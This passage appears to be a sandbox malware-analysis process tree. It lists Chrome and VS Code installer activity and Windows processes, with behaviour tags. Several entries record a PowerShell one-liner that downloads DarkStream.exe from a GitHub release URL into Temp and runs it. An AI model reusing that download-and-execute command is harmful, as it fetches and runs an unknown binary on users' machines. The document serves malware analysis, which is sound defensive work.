  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6480,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=6496 /prefetch:8
  2⤵
  PID:448
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=6476,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=6616 /prefetch:8
  2⤵
  PID:3948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6316,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=6064 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:956
- C:\Users\Admin\Downloads\VSCodeUserSetup-x64-1.98.0.exe
  "C:\Users\Admin\Downloads\VSCodeUserSetup-x64-1.98.0.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3428
- - C:\Users\Admin\AppData\Local\Temp\is-9R06T.tmp\VSCodeUserSetup-x64-1.98.0.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-9R06T.tmp\VSCodeUserSetup-x64-1.98.0.tmp" /SL5="$90384,106177668,841216,C:\Users\Admin\Downloads\VSCodeUserSetup-x64-1.98.0.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:2376
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Get-WmiObject Win32_Process | Where-Object { $_.ExecutablePath -eq 'C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe' } | Select @{Name='Id'; Expression={$_.ProcessId}} | Stop-Process -Force"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2336
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code" /inheritancelevel:r /grant:r "*S-1-5-18:(OI)(CI)F" /grant:r "*S-1-5-32-544:(OI)(CI)F" /grant:r "*S-1-5-11:(OI)(CI)RX" /grant:r "*S-1-5-32-545:(OI)(CI)RX" /grant:r "*S-1-3-0:(OI)(CI)F" /grant:r "Admin:(OI)(CI)F"
      4⤵
      Modifies file permissions
      PID:5012
  - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
      "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      Checks processor information in registry
      Modifies registry class
      PID:1384
    - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1740,i,4961854126871696147,9477516722217977818,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1732 /prefetch:2
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:888
    - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=1824,i,4961854126871696147,9477516722217977818,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1920 /prefetch:11
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1076
    - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --app-user-model-id=Microsoft.VisualStudioCode --app-path="C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app" --enable-sandbox --enable-blink-features=HighlightAPI --disable-blink-features=FontMatchingCTMigration,StandardizedBrowserZoom, --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=3120,i,4961854126871696147,9477516722217977818,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3116 --vscode-window-config=vscode:83fc4d33-d67e-4341-b3c0-790867578b06 /prefetch:1
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5396
    - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3628,i,4961854126871696147,9477516722217977818,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3624 /prefetch:14
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5792
      - \??\c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe
        
        "c:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\bin\code-tunnel.exe" tunnel status
        6⤵
        Executes dropped EXE
        
        PID:5788
    - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3656,i,4961854126871696147,9477516722217977818,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3652 /prefetch:14
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5800
    - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --dns-result-order=ipv4first --inspect-port=0 --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=3708,i,4961854126871696147,9477516722217977818,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3704 /prefetch:14
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5836
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /d /s /c "wsl.exe -l -q"
        5⤵
        
        PID:6120
    - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --app-user-model-id=Microsoft.VisualStudioCode --app-path="C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\resources\app" --enable-sandbox --enable-blink-features=HighlightAPI --disable-blink-features=FontMatchingCTMigration,StandardizedBrowserZoom, --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3820,i,4961854126871696147,9477516722217977818,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=3816 --vscode-window-config=vscode:83fc4d33-d67e-4341-b3c0-790867578b06 /prefetch:1
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5360
    - - C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe
        
        "C:\Users\Admin\AppData\Local\Programs\Microsoft VS Code\Code.exe" --type=utility --utility-sub-type=node.mojom.NodeService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\Admin\AppData\Roaming\Code" --standard-schemes=vscode-webview,vscode-file --enable-sandbox --secure-schemes=vscode-webview,vscode-file --cors-schemes=vscode-webview,vscode-file --fetch-schemes=vscode-webview,vscode-file --service-worker-schemes=vscode-webview --code-cache-schemes=vscode-webview,vscode-file --field-trial-handle=4260,i,4961854126871696147,9477516722217977818,262144 --disable-features=CalculateNativeWinOcclusion,PlzDedicatedWorker,SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:14
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6220,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5308 /prefetch:8
  2⤵
  - NTFS ADS
  PID:5612
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=7164,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=7132 /prefetch:1
  2⤵
  PID:2128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=5088,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:5264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7304,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=7308 /prefetch:8
  2⤵
  PID:3880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7420,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=7428 /prefetch:8
  2⤵
  PID:5664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=4460,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=4420 /prefetch:1
  2⤵
  PID:2444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6336,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5508 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:4824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=6344,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=6168 /prefetch:2
  2⤵
  PID:5548
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=6168,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5416 /prefetch:1
  2⤵
  PID:5504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=6240,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=7316 /prefetch:1
  2⤵
  PID:2844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6012,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5936 /prefetch:8
  2⤵
  PID:4384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6356,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5956 /prefetch:8
  2⤵
  PID:5964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=7704,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=7436 /prefetch:1
  2⤵
  PID:2828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=5920,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=7760 /prefetch:1
  2⤵
  PID:2036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=7784,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5728 /prefetch:1
  2⤵
  PID:1340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5164,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=7916 /prefetch:8
  2⤵
  PID:1444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=7924,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=7888 /prefetch:8
  2⤵
  PID:4148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=8044,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=7968 /prefetch:1
  2⤵
  PID:5472
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=7708,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5860 /prefetch:1
  2⤵
  PID:108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7952,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  - NTFS ADS
  PID:2424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=8060,i,16787466049913442795,9768150159058212926,262144 --variations-seed-version=20250305-180124.387000 --mojo-platform-channel-handle=4476 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4824

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3108

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004DC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:1088

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')" && start C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
1⤵
PID:4508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1676
- C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
  C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
  2⤵
  - Executes dropped EXE
  PID:1076

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
PID:1492

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:3056

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:4908

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:1608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
1⤵
PID:2500
- C:\Windows\system32\cmd.exe
  cmd.exe /c Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')"
  2⤵
  PID:4492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2392
- C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
  C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
  2⤵
  - Executes dropped EXE
  PID:2928
- C:\Windows\system32\cmd.exe
  cmd.exe /c Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')"
  2⤵
  PID:4772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1948

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:692

C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\wt.exe
"C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\wt.exe" -d "C:\Users\Admin\Desktop\."
1⤵
PID:3712
- C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe
  wt.exe -d "C:\Users\Admin\Desktop\."
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:2784
- - C:\Windows\system32\wsl.exe
    C:\Windows\system32\wsl.exe --list
    3⤵
    PID:2736
- - C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe
    "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.6.10571.0_x64__8wekyb3d8bbwe\OpenConsole.exe" --headless --win32input --resizeQuirk --width 120 --height 27 --signal 0xa24 --server 0xa20
    3⤵
    PID:5056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1172

C:\Windows\system32\mmc.exe
"C:\Windows\system32\mmc.exe" "C:\Windows\system32\WF.msc"
1⤵
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:376

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')" && start C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
1⤵
PID:1280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:3972
- C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
  C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
  2⤵
  - Executes dropped EXE
  PID:4168

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')" && start C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
1⤵
PID:3952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:420
- C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
  C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
  2⤵
  - Executes dropped EXE
  PID:3252

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')" && start C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
1⤵
PID:4808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/ashley20021ss/nini/releases/download/yes/DarkStream.exe','C:\Users\Admin\AppData\Local\Temp\DarkStream.exe')"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2860
- C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
  C:\Users\Admin\AppData\Local\Temp\DarkStream.exe
  2⤵
  - Executes dropped EXE
  PID:1052

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004DC
1⤵
PID:4964

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5988

C:\Windows\System32\WScript.exe
